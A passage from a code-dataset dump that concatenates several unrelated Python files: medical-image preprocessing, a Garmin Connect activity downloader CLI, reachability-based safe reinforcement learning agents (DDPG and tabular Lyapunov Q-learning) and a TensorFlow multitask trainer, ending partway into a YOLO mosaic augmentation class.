voxels = np.zeros((len(df), 48, 48, 48), dtype=np.uint8)
augmenter = Augmenter(hflip=True, rotate=True, blurring=True)
augmenter2 = Augmenter(hflip=False, rotate=False, blurring=False)
for i, row in df.iterrows():
voxels[int(row.id)] = np.load('{0}/{1:.0f}.npy'.format(dir, row.id))
for i in range(10):
folder = '{0}/{1}/'.format(dir, i)
if not os.path.exists(folder):
os.makedirs(folder)
tests = df[df.fold == i].copy()
trains = df[df.fold != i].copy()
trains.testing = 0
new_df = pd.concat([tests, trains])
new_df.to_csv(folder + '/labels.csv', index=False)
for j, row in tests.iterrows():
voxel = voxels[int(row.id)]
for e, im in enumerate(augmenter2.augment(voxel)):
im2 = resize(im)
im2.save('{0}{1:.0f}.{2}.png'.format(folder, row.id, e))
for j, row in trains.iterrows():
voxel = voxels[int(row.id)]
for e, im in enumerate(augmenter.augment(voxel)):
im2 = resize(im)
im2.save('{0}{1:.0f}.{2}.png'.format(folder, row.id, e))
def get_dataset(dir):
df = pd.read_csv(path.join(dir, 'labels.csv'))
df_test = df[df.testing == 1]
df_train = df[df.testing == 0]
num_data = len(df_train)
aug_size = 18
x = t.zeros((num_data * aug_size, 1, img_size, img_size))
y = t.zeros((num_data * aug_size, 1))
c = 0
for i, row in df_train.iterrows():
id = int(row.id)
for j in range(aug_size):
im = imread(path.join(dir, f'{id:.0f}.{j}.png'))
x[c * aug_size + j, 0, :, :] = t.from_numpy(im)
y[c * aug_size + j][0] = row.malignancy_th
c += 1
mu = x.mean()
sd = x.std()
x = (x - mu) / sd
trainset = TensorDataset(x, y)
aug_size = 3
num_data = len(df_test)
x = t.zeros((num_data * aug_size, 1, img_size, img_size))
y = t.zeros((num_data * aug_size, 1))
c = 0
for i, row in df_test.iterrows():
id = int(row.id)
for j in range(aug_size):
im = imread(path.join(dir, f'{id:.0f}.{j}.png'))
x[c * aug_size + j, 0, :, :] = t.from_numpy(im)
y[c * aug_size + j][0] = row.malignancy_th
c += 1
x = (x - mu) / sd
testset = TensorDataset(x, y)
return trainset, testset
def get_dataset3d(dir):
df = pd.read_csv(path.join(dir, 'labels.csv'))
df_test = df[df.testing == 1]
df_train = df[df.testing == 0]
num_data = len(df_train)
aug_size = 18
x = t.zeros((num_data * aug_size, 3, img_size, img_size))
y = t.zeros((num_data * aug_size, 1))
c = 0
for i, row in df_train.iterrows():
id = int(row.id)
for j in range(aug_size):
im = imread(path.join(dir, f'{id:.0f}.{j}.png'))
x[c * aug_size + j, 0, :, :] = t.from_numpy(im)
y[c * aug_size + j][0] = row.malignancy_th
x[c * aug_size + j, 1, :, :] = x[c * aug_size + j, 0, :, :]
x[c * aug_size + j, 2, :, :] = x[c * aug_size + j, 0, :, :]
c += 1
mu = x.mean()
sd = x.std()
x = (x - mu) / sd
trainset = TensorDataset(x, y)
aug_size = 3
num_data = len(df_test)
x = t.zeros((num_data * aug_size, 3, img_size, img_size))
y = t.zeros((num_data * aug_size, 1))
c = 0
for i, row in df_test.iterrows():
id = int(row.id)
for j in range(aug_size):
im = imread(path.join(dir, f'{id:.0f}.{j}.png'))
x[c * aug_size + j, 0, :, :] = t.from_numpy(im)
y[c * aug_size + j][0] = row.malignancy_th
x[c * aug_size + j, 1, :, :] = x[c * aug_size + j, 0, :, :]
x[c * aug_size + j, 2, :, :] = x[c * aug_size + j, 0, :, :]
c += 1
x = (x - mu) / sd
testset = TensorDataset(x, y)
return trainset, testset
if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
generate_dataset(sys.argv[1])
else:
print("run \"python3 preprocessing.py <path to output directory>\"")
``` |
{
"source": "62north/garminexport",
"score": 3
} |
#### File: garminexport/cli/get_activity.py
```python
import argparse
import getpass
import logging
import os
from datetime import timedelta
import dateutil.parser
import garminexport.backup
from garminexport.garminclient import GarminClient
from garminexport.logging_config import LOG_LEVELS
from garminexport.retryer import Retryer, ExponentialBackoffDelayStrategy, MaxRetriesStopStrategy
logging.basicConfig(level=logging.INFO, format="%(asctime)-15s [%(levelname)s] %(message)s")
log = logging.getLogger(__name__)
def main():
parser = argparse.ArgumentParser(
description="Downloads one particular activity for a given Garmin Connect account.")
# positional args
parser.add_argument(
"username", metavar="<username>", type=str, help="Account user name.")
parser.add_argument(
"activity", metavar="<activity>", type=int, help="Activity ID.")
parser.add_argument(
"format", metavar="<format>", type=str,
help="Export format (one of: {}).".format(garminexport.backup.supported_export_formats))
# optional args
parser.add_argument(
"--password", type=str, help="Account password.")
parser.add_argument(
"--destination", metavar="DIR", type=str,
help="Destination directory for downloaded activity. Default: ./activities/",
default=os.path.join(".", "activities"))
parser.add_argument(
"--log-level", metavar="LEVEL", type=str,
help="Desired log output level (DEBUG, INFO, WARNING, ERROR). Default: INFO.",
default="INFO")
args = parser.parse_args()
if args.log_level not in LOG_LEVELS:
raise ValueError("Illegal log-level argument: {}".format(args.log_level))
if args.format not in garminexport.backup.supported_export_formats:
raise ValueError(
"Unrecognized export format: '{}'. Must be one of {}".format(
args.format, garminexport.backup.supported_export_formats))
logging.root.setLevel(LOG_LEVELS[args.log_level])
try:
if not os.path.isdir(args.destination):
os.makedirs(args.destination)
if not args.password:
            args.password = getpass.getpass("Enter password: ")
with GarminClient(args.username, args.password) as client:
log.info("fetching activity %s ...", args.activity)
summary = client.get_activity_summary(args.activity)
# set up a retryer that will handle retries of failed activity downloads
retryer = Retryer(
delay_strategy=ExponentialBackoffDelayStrategy(initial_delay=timedelta(seconds=1)),
stop_strategy=MaxRetriesStopStrategy(5))
start_time = dateutil.parser.parse(summary["summaryDTO"]["startTimeGMT"])
garminexport.backup.download(
client, (args.activity, start_time), retryer, args.destination, export_formats=[args.format])
except Exception as e:
log.error("failed with exception: %s", e)
raise
``` |
{
"source": "62subinh/deeprl_safety_specification",
"score": 2
} |
#### File: lyapunov_reachability/common/gradient.py
```python
import torch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def flat_grad(grads):
grad_flatten = []
for grad in grads:
grad_flatten.append(grad.view(-1))
grad_flatten = torch.cat(grad_flatten)
return grad_flatten
def flat_hessian(hessians):
hessians_flatten = []
for hessian in hessians:
hessians_flatten.append(hessian.contiguous().view(-1))
hessians_flatten = torch.cat(hessians_flatten).data
return hessians_flatten
def kl_divergence(new_actor, old_actor, obs, deterministic=True):
if deterministic:
mu = new_actor(obs)
mu_old = old_actor(obs)
mu_old = mu_old.detach()
kl = (mu_old - mu).pow(2) / 2.0
return kl.sum(1, keepdim=True)
else:
mu, std = new_actor(obs)
mu_old, std_old = old_actor(obs)
mu_old = mu_old.detach()
std_old = std_old.detach()
# kl divergence between old policy and new policy : D( pi_old || pi_new )
# pi_old -> mu_old, std_old / pi_new -> mu, std
# be careful of calculating KL-divergence. It is not symmetric metric.
kl = torch.log(std / std_old) + (std_old.pow(2) + (mu_old - mu).pow(2)) / (2.0 * std.pow(2)) - 0.5
return kl.sum(1, keepdim=True)
def hessian_vector_product(new_actor, old_actor, obs, p, cg_damping=1e-1):
p.detach()
kl = kl_divergence(new_actor=new_actor, old_actor=old_actor, obs=obs)
kl = kl.mean()
kl_grad = torch.autograd.grad(kl, new_actor.parameters(), create_graph=True)
kl_grad = flat_grad(kl_grad)
kl_grad_p = (kl_grad * p).sum()
kl_hessian = torch.autograd.grad(kl_grad_p, new_actor.parameters())
kl_hessian = flat_hessian(kl_hessian)
return kl_hessian + p * cg_damping
# from openai baseline code
# https://github.com/openai/baselines/blob/master/baselines/common/cg.py
def conjugate_gradient(actor, target_actor, obs, b, nsteps=10, residual_tol=1e-10):
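    # Iteratively solves A x = b where A is the KL Hessian (Fisher information matrix),
    # accessed only through Hessian-vector products rather than formed explicitly.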
x = torch.zeros(b.size(), device=device)
r = b.clone()
p = b.clone()
rdotr = torch.dot(r, r)
for i in range(nsteps):
Ap = hessian_vector_product(actor, target_actor, obs, p, cg_damping=1e-1)
alpha = rdotr / torch.dot(p, Ap)
x += alpha * p
r -= alpha * Ap
new_rdotr = torch.dot(r, r)
betta = new_rdotr / rdotr
p = r + betta * p
rdotr = new_rdotr
if rdotr < residual_tol:
break
return x
```
#### File: lyapunov_reachability/speculation_ddpg/ddpg.py
```python
import os
import pickle
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from lyapunov_reachability.speculation_ddpg.base import ContinuousBase
from lyapunov_reachability.common.utils import init_weights
from lyapunov_reachability.common.models import *
# if gpu is to be used
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class OUNoise:
def __init__(self, action_size, theta, mu, sigma):
self.action_size = action_size
self.theta = theta
self.mu = mu
self.sigma = sigma
self.X = np.zeros(self.action_size)
def sample(self):
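        # Euler step (dt = 1) of the Ornstein-Uhlenbeck process: dX = theta * (mu - X) + sigma * N(0, I)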
dx = self.theta * (self.mu - self.X) + self.sigma * np.random.randn(len(self.X))
self.X = self.X + dx
return self.X
class SimpleDDPG(ContinuousBase):
def __init__(
self, env, confidence, extractor=None, extractor_params=None, decoder=None, decoder_params=None,
seed=None, lr=1e-3, batch_size=128, gamma=0.999, ob_resize=32, grid_points=21, strict_done=False,
buffer_size=int(1e5), polyak=1e-3, noise_theta=0.15, noise_mu=0., noise_sigma=0.3, gradient_clip=(0.5, 1.0),
lr_ratio=0.1, re_init=False, save_dir='../../simple-ddpg'):
# Neural networks
self.actor = None
self.critic = None
self.target_actor = None
self.target_critic = None
# Optimizers
self.actor_optimizer = None
self.critic_optimizer = None
# Noise generator
self.ou_noise = OUNoise(len(env.action_space.low), noise_theta, noise_mu, noise_sigma)
# Parameters
self.polyak = polyak # Soft target update
self.gradient_clip = gradient_clip # (clip_critic, clip_actor)
self.lr_ratio = lr_ratio # actor_lr = critic_lr * lr_ratio
super(SimpleDDPG, self).__init__(
env, confidence, extractor, extractor_params, decoder, decoder_params, seed, lr, batch_size, gamma,
ob_resize, grid_points, strict_done, buffer_size, None, None, re_init, save_dir)
self.act_high = self.env.action_space.high
self.act_low = self.env.action_space.low
def setup_model(self, extractor=None, extractor_params=None, decoder=None, decoder_params=None):
"""
actor: Marginally safe policy.
critic: Reachability value function w.r.t. the actor.
"""
# model_ = Cnn
# params_ = {'channels_': [16, 32, 32], 'kernel_sizes_': [5, 5, 5], 'strides_': [2, 2, 2],}
self.critic = ProbCritic(self.ob_space, self.ac_space, extractor, extractor_params,
decoder=decoder, decoder_params=decoder_params)
self.actor = DetActor(self.ob_space, self.ac_space, extractor, extractor_params,
decoder=decoder, decoder_params=decoder_params)
self.target_critic = ProbCritic(self.ob_space, self.ac_space, extractor, extractor_params,
decoder=decoder, decoder_params=decoder_params)
self.target_actor = DetActor(self.ob_space, self.ac_space, extractor, extractor_params,
decoder=decoder, decoder_params=decoder_params)
def setup_optimizer(self, reload=False, baseline_dir=None, baseline_step=None):
if reload:
print("Check if you called agent.load_weights(load_dir)!")
        elif baseline_dir is None or baseline_step is None:
init_weights(self.critic)
init_weights(self.actor)
self.hard_target_update()
else:
raise RuntimeError("Baseline training is not supported.")
self.hard_target_update()
self.critic.cuda(device)
self.actor.cuda(device)
self.target_actor.cuda(device)
self.target_critic.cuda(device)
self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=self.lr)
self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=self.lr*self.lr_ratio)
def update_network(self, *args):
"""
For more information, see
(a) https://lilianweng.github.io/lil-log/2018/04/08/policy-gradient-algorithms.html.
(b) https://github.com/dongminlee94/Samsung-DRL-Code/tree/master/3_A2C_DDPG
:param obs_t: Observation at time t.
:param act_t: Action taken at time t, drawn from exploratory policy.
:param obs_tp1: Observation at time t+1.
:param reached: 1. (True) if the agent ever reached target at time interval (0, t].
:param done: 1. (True) if obs_t is the final state of the trajectory.
"""
try:
obs_t, act_t, obs_tp1, reached, done = self._draw_batch()
except ValueError:
return
# Get q-value.
q_t = self.critic(obs_t, act_t).squeeze(1)
# Get target q.
act_tp1 = self.target_actor(obs_tp1)
q_tp1 = self.target_critic(obs_tp1, act_tp1).squeeze(1)
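        # Bellman target for the reach probability: 1 once the target set has been reached,
        # otherwise the discounted value of the next state-action pair (cut off at terminal states).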
q_t_target = (1. - reached) * (1. - done) * (self.gamma * q_tp1) + reached
critic_loss = F.mse_loss(q_t, q_t_target)
self.critic_optimizer.zero_grad()
critic_loss.backward()
nn.utils.clip_grad_norm_(self.critic.parameters(), self.gradient_clip[0])
self.critic_optimizer.step()
# Get actor
actor_a_t = self.actor(obs_t)
actor_loss = self.critic(obs_t, actor_a_t).mean()
self.actor_optimizer.zero_grad()
actor_loss.backward()
nn.utils.clip_grad_norm_(self.actor.parameters(), self.gradient_clip[1])
self.actor_optimizer.step()
def step(self, obs, *args):
pre_act = self.actor(self.transform(obs).unsqueeze(0).to(device)).detach()
act = pre_act.data.cpu().numpy()[0] + self.ou_noise.sample()
act = np.clip(act, -1., 1.)
# Denormalize action before apply it to env.
return (act + 1.) * 0.5 * (self.act_high - self.act_low) + self.act_low
def verify_state(self, obs):
with torch.no_grad():
obs_b = self.transform(obs).unsqueeze(0).to(device)
act_b = self.actor(obs_b)
reachability = self.critic(obs_b, act_b)
return reachability.data.cpu().numpy()[0]
def target_update(self):
self.soft_target_update()
def hard_target_update(self):
for target_param, param in zip(self.target_critic.parameters(), self.critic.parameters()):
target_param.data.copy_(param.data)
for target_param, param in zip(self.target_actor.parameters(), self.actor.parameters()):
target_param.data.copy_(param.data)
def soft_target_update(self):
for target_param, param in zip(self.target_critic.parameters(), self.critic.parameters()):
target_param.data.copy_(param.data * self.polyak + target_param.data * (1.0 - self.polyak))
for target_param, param in zip(self.target_actor.parameters(), self.actor.parameters()):
target_param.data.copy_(param.data * self.polyak + target_param.data * (1.0 - self.polyak))
def save_setup(self, extractor, extractor_params, decoder, decoder_params, save_env=False):
if save_env:
with open(os.path.join(self.save_dir, 'env.pkl'), 'wb') as f:
pickle.dump(self.env, f)
data = {
"confidence": self.confidence,
"extractor": extractor.__name__,
"extractor_params": extractor_params,
"decoder": None if decoder is None else decoder.__name__,
"decoder_params": decoder_params,
"seed": self.seed,
"lr": self.lr,
"batch_size": self.batch_size,
"gamma": self.gamma,
"ob_resize": self.ob_space[-1],
"grid_points": self.grid_points,
"strict_done": self.strict_done,
"buffer_size": self.replay.buffer_size,
"polyak": self.polyak,
"noise_theta": self.ou_noise.theta,
"noise_mu": self.ou_noise.mu,
"noise_sigma": self.ou_noise.sigma,
"gradient_clip": self.gradient_clip,
"lr_ratio": self.lr_ratio
}
with open(os.path.join(self.save_dir, "params.pkl".format(self.steps)), 'wb') as f:
pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)
def save_weights(self):
torch.save(self.critic.state_dict(), os.path.join(self.save_dir, "{}-critic".format(self.steps)))
torch.save(self.actor.state_dict(), os.path.join(self.save_dir, "{}-actor".format(self.steps)))
def load_weights(self, load_dir):
self.critic.load_state_dict(torch.load(os.path.join(load_dir, "{}-critic".format(self.steps))))
self.actor.load_state_dict(torch.load(os.path.join(load_dir, "{}-actor".format(self.steps))))
self.critic.eval()
self.actor.eval()
self.hard_target_update()
if __name__ == '__main__':
from classic_envs.pendulum import VanillaPendulumEnv
from lyapunov_reachability.common.networks import Mlp, Cnn
grid_points = 31
episode_length = 300
confidence = 0.8
gamma = 0.9999
strict_done = True
env = VanillaPendulumEnv()
name = '{}-pendulum'.format(int(episode_length))
steps = int(5e6)
log_interval = int(1e4)
save_interval = int(1e5)
# Create & train
ddpg = SimpleDDPG(
env, confidence, extractor=Mlp, extractor_params={'channels_': [400, 300], 'activ': 'tanh'}, seed=1234,
gamma=gamma, grid_points=grid_points, strict_done=strict_done, save_dir=os.path.join(name, 'ddpg-initial'))
ddpg.run(steps, episode_length, log_interval=log_interval, save_interval=save_interval, )
```
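The exploration noise drawn in `step` comes from `self.ou_noise`, whose `theta`, `mu`, and `sigma` are saved in `save_setup` but whose class is defined elsewhere in the package. A minimal Ornstein-Uhlenbeck noise sketch compatible with that interface might look like this (the class name and constructor signature are assumptions, not the package's actual implementation):
```python
import numpy as np

class OUNoise:
    """Ornstein-Uhlenbeck process: dx = theta * (mu - x) + sigma * dW."""

    def __init__(self, act_dim, mu=0.0, theta=0.15, sigma=0.2):
        self.mu = mu * np.ones(act_dim)
        self.theta = theta
        self.sigma = sigma
        self.reset()

    def reset(self):
        # Restart the process from its mean.
        self.state = np.copy(self.mu)

    def sample(self):
        # One Euler step; successive samples are temporally correlated.
        dx = self.theta * (self.mu - self.state) + self.sigma * np.random.randn(len(self.mu))
        self.state = self.state + dx
        return self.state
```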
#### File: lyapunov_reachability/speculation_tabular/lyapunov.py
```python
import os.path
import numpy as np
from lyapunov_reachability.speculation_tabular.base import QBase
import cplex
from cplex.exceptions import CplexSolverError
class LyapunovQAgent(QBase):
def __init__(
self, env, confidence, nb_states, nb_actions, initial_policy, terminal_states, seed=None, strict_done=True,
safe_init=False, baseline_dir=None, baseline_step=None, save_dir='../../spec-tb-lyapunov'):
self.operative_q = np.ones((nb_states, nb_actions))
self.operative_q[terminal_states] = 0.
self.time_q = np.zeros((nb_states, nb_actions))
self.lyapunov_q = self.operative_q * 1.
self.auxiliary_cost = 0.
super(LyapunovQAgent, self).__init__(
env, confidence, nb_states, nb_actions, initial_policy, terminal_states, seed=seed, strict_done=strict_done,
safe_init=safe_init, baseline_dir=baseline_dir, baseline_step=baseline_step, save_dir=save_dir)
def load_baseline(self, baseline):
data = np.load(baseline)
self.reachability_q[:] = data['reachability_q']
self.updates_q[:] = data['updates_q']
if 'policy' in data.keys():
self.policy = data['policy']
else:
safest_reachability = np.min(self.reachability_q, axis=-1, keepdims=True)
self.policy[:] = (self.reachability_q - safest_reachability == 0.) * 1.
self.policy[:] = self.policy / np.sum(self.policy, axis=-1, keepdims=True)
self.operative_q[:] = data['reachability_q']
def save_model(self, path):
info = dict()
info['policy'] = self.policy
info['steps'] = self.steps
# Q learning-specific properties
info['reachability_q'] = self.reachability_q
info['updates_q'] = self.updates_q
info['operative_q'] = self.operative_q
info['time_q'] = self.time_q
info['lyapunov_q'] = self.lyapunov_q
# Other values...
info['auxiliary_cost'] = self.auxiliary_cost
np.savez(path + '.npz', **info)
def load_model(self, load_dir):
data = np.load(os.path.join(load_dir, '{}.npz'.format(self.steps)))
self.reachability_q = data['reachability_q']
self.updates_q = data['updates_q']
self.operative_q = data['operative_q']
self.time_q = data['time_q']
self.lyapunov_q = data['lyapunov_q']
self.auxiliary_cost = data['auxiliary_cost']
def step(self, state, **kwargs):
try:
action = np.random.choice(self.nb_actions, 1, p=self.policy[state, :])[0]
if kwargs.get('epsilon', 0.) > np.random.rand():
action = self.env.action_space.sample()
if np.min(self.reachability_q[state, :]) > 1. - self.confidence:
action = np.argmin(self.reachability_q[state, :])
return action
except ValueError:
print("Error: stochastic policy is not feasible. Policy=\t" + str(self.policy[state, :]))
def extra_setup(self, steps, episode_length, improve_interval, log_interval, save_interval, **kwargs):
self.time_q[:] = episode_length
def _log_auxiliary(self, **kwargs):
return
def _iteration(self, t, state, action, next_state, safety, done, **kwargs):
improve_interval = kwargs.get('improve_interval', 1)
lr = kwargs.get('learning_rate', 1.)
gamma = kwargs.get('gamma', .99)
criterion = kwargs.get('criterion', 1e2)
# Approximate the Q-functions ---------------------------------------------------------------------------------
self.updates_q[state, action] += 1.
_lr = lr / (0.99 + 0.01 * self.updates_q[state, action])
if safety == 0.:
self.reachability_q[state, :] = 1.
self.operative_q[state, :] = 1.
else:
self.reachability_q[state, action] =\
(1. - _lr) * self.reachability_q[state, action] +\
_lr * gamma * np.min(self.reachability_q[next_state, :]) * (1. - done)
self.operative_q[state, action] =\
(1. - _lr) * self.operative_q[state, action] +\
_lr * gamma * np.sum(self.operative_q[next_state, :] * self.policy[next_state, :]) * (1. - done)
self.time_q[state, action] =\
(1. - _lr) * self.time_q[state, action] +\
_lr * (1. + np.sum(self.time_q[next_state, :] * self.policy[next_state, :])) * (1. - done)
# Improve the policy ------------------------------------------------------------------------------------------
if t % improve_interval == 0:
convergence_mask = np.min(self.updates_q, -1) > criterion
self.updates_q[convergence_mask] *= 0.
self._policy_improvement(1. * convergence_mask)
return
def _policy_improvement(self, convergence_mask):
converged_states = np.where(convergence_mask > 0.)[0]
_operative_v = np.sum(self.operative_q * self.policy, -1)
_operative_t = np.sum(self.time_q * self.policy, -1)
try:
_max_reachability = np.max(_operative_v[_operative_v <= 1. - self.confidence])
except ValueError:
_max_reachability = 1. - self.confidence
epsilon = ((1. - self.confidence) - _max_reachability) / np.max(_operative_t)
_lyapunov_q = self.operative_q + self.time_q * epsilon
invalid_indices = np.isnan(_lyapunov_q)
valid_indices = ~invalid_indices
self.lyapunov_q[valid_indices] = _lyapunov_q[valid_indices]
self.lyapunov_q[invalid_indices] = self.operative_q[invalid_indices]
c = cplex.Cplex()
c.set_log_stream(None)
c.set_error_stream(None)
c.set_warning_stream(None)
c.set_results_stream(None)
# for state in converged_states:
for state in range(self.nb_states):
c.variables.delete()
c.linear_constraints.delete()
# Objective: Minimize pi(*|x) * Q_L(x,*) for each x. *Get the safest*
# Bounds: pi(a|x) >= 0 for all a (same as default setting)
obj = self.lyapunov_q[state, :] - np.min(self.lyapunov_q[state, :])
lb = [0.0] * self.nb_actions
indices = list(c.variables.add(obj=list(obj), lb=lb))
# Subject to: (1) sum(pi(*|x)) == 1, (2) pi(*|x) * Q_L(x,*) <= L(x)
# (2) is inequality, (1) is equality constraint. ("L")
A = [cplex.SparsePair(indices[:], [1.] * self.nb_actions)]
b = [1.]
senses = ["E"]
# (2) only applies when the state is safe.
A.append(cplex.SparsePair(indices[:], list(self.lyapunov_q[state, :])))
b.append(np.sum(self.lyapunov_q[state, :] * self.policy[state, :]) + epsilon)
senses.append("L")
c.linear_constraints.add(lin_expr=A, senses=senses, rhs=b)
try:
c.solve()
_answer = np.array(c.solution.get_values())
if np.sum(_answer) == 1. and np.sum(_answer > 1.) == 0 and np.sum(_answer < 0.) == 0:
self.policy[state, :] = _answer
except CplexSolverError:
print("Error: unable to find feasible policy at [state ID: %d]." % state)
return
``` |
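The `_policy_improvement` step above solves one small linear program per state with CPLEX: minimize pi(.|x) . Q_L(x,.) subject to pi being a probability vector and pi(.|x) . Q_L(x,.) <= pi_old(.|x) . Q_L(x,.) + epsilon. If CPLEX is unavailable, the same LP can be sketched with SciPy (the helper name and structure are illustrative only, not part of the original code):
```python
import numpy as np
from scipy.optimize import linprog

def improve_state_policy(lyapunov_q_row, old_policy_row, epsilon):
    """min_pi pi.q  s.t.  sum(pi) = 1,  pi >= 0,  pi.q <= old_pi.q + epsilon."""
    q = lyapunov_q_row - np.min(lyapunov_q_row)                  # same shift as the CPLEX objective
    budget = np.sum(lyapunov_q_row * old_policy_row) + epsilon
    res = linprog(c=q,
                  A_ub=lyapunov_q_row[None, :], b_ub=[budget],   # Lyapunov ("L") constraint
                  A_eq=np.ones((1, q.size)), b_eq=[1.0],         # probabilities sum to one
                  bounds=[(0.0, None)] * q.size, method='highs')
    return res.x if res.success else old_policy_row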
{
"source": "62theories/tf-flask",
"score": 2
} |
#### File: modeling/multitask/base_trainer.py
```python
from typing import Union
import gin
import orbit
import tensorflow as tf
from official.modeling.multitask import base_model
from official.modeling.multitask import multitask
@gin.configurable
class MultiTaskBaseTrainer(orbit.StandardTrainer):
"""Multitask base trainer."""
def __init__(self,
multi_task: multitask.MultiTask,
multi_task_model: Union[tf.keras.Model,
base_model.MultiTaskBaseModel],
optimizer: tf.optimizers.Optimizer,
trainer_options=None,
train_datasets=None):
self._strategy = tf.distribute.get_strategy()
self._multi_task = multi_task
self._multi_task_model = multi_task_model
self._optimizer = optimizer
self._training_losses = None
self._training_metrics = None
self._global_step = orbit.utils.create_global_step()
if hasattr(self.multi_task_model, "checkpoint_items"):
checkpoint_items = self.multi_task_model.checkpoint_items
else:
checkpoint_items = {}
self._checkpoint = tf.train.Checkpoint(
model=self.multi_task_model,
optimizer=self.optimizer,
global_step=self.global_step,
**checkpoint_items)
if train_datasets is None:
train_datasets = {}
for name, task in self.multi_task.tasks.items():
train_datasets[name] = orbit.utils.make_distributed_dataset(
self.strategy, task.build_inputs, task.task_config.train_data)
super().__init__(
train_dataset=train_datasets,
options=trainer_options or orbit.StandardTrainerOptions())
def train_loop_begin(self):
"""Clean up states that hold losses and metrics."""
for _, train_loss_metric in self.training_losses.items():
train_loss_metric.reset_states()
for _, metrics in self.training_metrics.items():
for metric in metrics:
metric.reset_states()
def train_loop_end(self):
"""Record loss and metric values per task."""
result = {}
for task_name, loss in self.training_losses.items():
result[task_name] = {loss.name: loss.result()}
for task_name, task_metrics in self.training_metrics.items():
result[task_name].update(
{metric.name: metric.result() for metric in task_metrics})
    # Note that the learning rate schedule is managed by the keras optimizer
    # internally, which respects the number of backward passes as `iterations`.
    # The learning rate schedule does not follow the trainer's logical global
    # step across multiple tasks.
if callable(self.optimizer.learning_rate):
result["learning_rate"] = self.optimizer.learning_rate(
self.optimizer.iterations)
else:
result["learning_rate"] = self.optimizer.learning_rate
return result
@property
def checkpoint(self):
"""Accesses the training checkpoint."""
return self._checkpoint
@property
def training_losses(self):
"""Access training loss metric objects for all tasks."""
if self._training_losses is None:
# Builds the per-task metrics and losses.
      # This is the total summed training loss of tasks in the joint training.
self._training_losses = dict(
total_loss=tf.keras.metrics.Mean("training_loss", dtype=tf.float32))
for name in self.multi_task.tasks:
self._training_losses[name] = tf.keras.metrics.Mean(
"training_loss", dtype=tf.float32)
return self._training_losses
@property
def training_metrics(self):
"""Access training metric metric objects for all tasks."""
if self._training_metrics is None:
# Builds the per-task metrics and losses.
self._training_metrics = {}
for name, task in self.multi_task.tasks.items():
self._training_metrics[name] = task.build_metrics(training=True)
return self._training_metrics
@property
def strategy(self):
return self._strategy
@property
def multi_task(self):
return self._multi_task
@property
def multi_task_model(self):
return self._multi_task_model
@property
def optimizer(self):
return self._optimizer
@property
def global_step(self):
return self._global_step
def train_step(self, iterator_map):
"""The default train step calling the multi-task train step.
Args:
iterator_map: a dictionary of task names and per-task dataset iterators.
"""
def step_fn(inputs):
losses = self.multi_task.joint_train_step(
inputs,
multi_task_model=self.multi_task_model,
optimizer=self.optimizer,
task_metrics=self.training_metrics)
for key, loss in losses.items():
self.training_losses[key].update_state(loss)
self.strategy.run(
step_fn, args=(tf.nest.map_structure(next, iterator_map),))
self.global_step.assign_add(1)
```
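`train_step` above advances every per-task iterator in one call with `tf.nest.map_structure(next, iterator_map)` and hands the resulting dict of batches to `joint_train_step`. A small standalone illustration of that pattern (the task names are made up):
```python
import tensorflow as tf

# Two toy per-task datasets standing in for task.build_inputs(...).
iterator_map = {
    "classification": iter(tf.data.Dataset.range(10).batch(2)),
    "detection": iter(tf.data.Dataset.range(100, 110).batch(2)),
}

# Same call used inside MultiTaskBaseTrainer.train_step: one `next` per task,
# preserving the dictionary structure for the joint train step.
batch = tf.nest.map_structure(next, iterator_map)
print(batch["classification"].numpy(), batch["detection"].numpy())
```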
#### File: yolo/ops/mosaic.py
```python
import random
import tensorflow as tf
import tensorflow_addons as tfa
from official.vision.beta.ops import box_ops
from official.vision.beta.ops import preprocess_ops
from official.vision.beta.projects.yolo.ops import preprocessing_ops
class Mosaic:
"""Stitch together sets of 4 images to generate samples with more boxes."""
def __init__(self,
output_size,
mosaic_frequency=1.0,
mixup_frequency=0.0,
letter_box=True,
jitter=0.0,
mosaic_crop_mode='scale',
mosaic_center=0.25,
aug_scale_min=1.0,
aug_scale_max=1.0,
aug_rand_angle=0.0,
aug_rand_perspective=0.0,
aug_rand_translate=0.0,
random_pad=False,
random_flip=False,
area_thresh=0.1,
pad_value=preprocessing_ops.PAD_VALUE,
seed=None):
"""Initializes parameters for mosaic.
Args:
output_size: `Tensor` or `List` for [height, width] of output image.
mosaic_frequency: `float` indicating how often to apply mosaic.
mixup_frequency: `float` indicating how often to apply mixup.
      letter_box: `boolean` indicating whether, at the start of the data
        pipeline and regardless of the preprocessing ops that are used, the
        aspect ratio of the images should be preserved.
jitter: `float` for the maximum change in aspect ratio expected in each
preprocessing step.
      mosaic_crop_mode: `str` the type of mosaic to apply. The options are
        {crop, scale, None}; crop will construct a mosaic by slicing images
        together, scale will create a mosaic by concatenating and shifting the
        image, and None will default to scale and apply no post processing to
        the created mosaic.
      mosaic_center: `float` indicating how much to randomly deviate from the
        center of the image when creating a mosaic.
aug_scale_min: `float` indicating the minimum scaling value for image
scale jitter.
aug_scale_max: `float` indicating the maximum scaling value for image
scale jitter.
      aug_rand_angle: `float` indicating the maximum angle value; the rotation
        angle will be chosen between 0 and this value.
      aug_rand_perspective: `float` ranging from 0.000 to 0.001 indicating how
        much to perspective warp the image.
aug_rand_translate: `float` ranging from 0 to 1 indicating the maximum
amount to randomly translate an image.
      random_pad: `bool` indicating whether to use padding to apply random
        translation; true for darknet yolo, false for scaled yolo.
random_flip: `bool` whether or not to random flip the image.
area_thresh: `float` for the minimum area of a box to allow to pass
through for optimization.
pad_value: `int` padding value.
seed: `int` the seed for random number generation.
"""
self._output_size = output_size
self._area_thresh = area_thresh
self._mosaic_frequency = mosaic_frequency
self._mixup_frequency = mixup_frequency
self._letter_box = letter_box
self._random_crop = jitter
self._mosaic_crop_mode = mosaic_crop_mode
self._mosaic_center = mosaic_center
self._aug_scale_min = aug_scale_min
self._aug_scale_max = aug_scale_max
self._random_pad = random_pad
self._aug_rand_translate = aug_rand_translate
self._aug_rand_angle = aug_rand_angle
self._aug_rand_perspective = aug_rand_perspective
self._random_flip = random_flip
self._pad_value = pad_value
self._deterministic = seed is not None
self._seed = seed if seed is not None else random.randint(0, 2**30)
def _generate_cut(self):
"""Generate a random center to use for slicing and patching the images."""
if self._mosaic_crop_mode == 'crop':
min_offset = self._mosaic_center
cut_x = preprocessing_ops.random_uniform_strong(
self._output_size[1] * min_offset,
